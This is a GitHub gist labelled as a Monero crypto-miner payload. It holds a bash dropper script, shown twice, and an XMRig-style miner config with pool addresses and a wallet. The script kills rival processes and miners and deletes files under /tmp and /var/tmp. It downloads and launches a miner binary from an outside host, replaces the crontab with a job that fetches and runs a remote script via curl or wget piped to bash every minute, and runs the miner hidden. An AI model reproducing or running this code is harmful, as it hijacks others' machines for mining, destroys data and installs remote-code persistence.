Last active
June 27, 2020 16:04
-
-
Save 5shekel/b54824ebd6be4bd75442e1480d5f68b2 to your computer and use it in GitHub Desktop.
payload for monero crypto miner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
mkdir /var/tmp | |
chmod 777 /var/tmp | |
pkill -f getty | |
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
pkill -f /usr/bin/.sshd | |
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
chmod 777 /var/tmp/sustse | |
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
f2="www.tionhgjk.com:8220" | |
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
mkdir /var/tmp | |
chmod 777 /var/tmp | |
pkill -f getty | |
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
pkill -f /usr/bin/.sshd | |
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
chmod 777 /var/tmp/sustse | |
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
f2="www.tionhgjk.com:8220" | |
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"algo": "cryptonight", | |
"api": { | |
"port": 0, | |
"access-token": null, | |
"id": null, | |
"worker-id": null, | |
"ipv6": false, | |
"restricted": true | |
}, | |
"asm": true, | |
"autosave": true, | |
"av": 0, | |
"background": true, | |
"colors": true, | |
"cpu-affinity": null, | |
"cpu-priority": 5, | |
"donate-level": 1, | |
"huge-pages": true, | |
"hw-aes": null, | |
"log-file": null, | |
"max-cpu-usage": 95, | |
"pools": [ | |
{ | |
"url": "192.99.142.251:80", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "192.99.142.249:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "202.144.193.110:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
} | |
], | |
"print-time": 60, | |
"retries": 5, | |
"retry-pause": 5, | |
"safe": false, | |
"threads": { | |
"cn": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-lite": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-heavy": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
] | |
}, | |
"algo-perf": { | |
"cn": 2.0, | |
"cn/2": 2.0, | |
"cn/msr": 2.0, | |
"cn-lite": 2.0, | |
"cn-heavy": 2.0 | |
}, | |
"calibrate-algo": false, | |
"calibrate-algo-time": 10, | |
"user-agent": null, | |
"syslog": false, | |
"watch": false | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment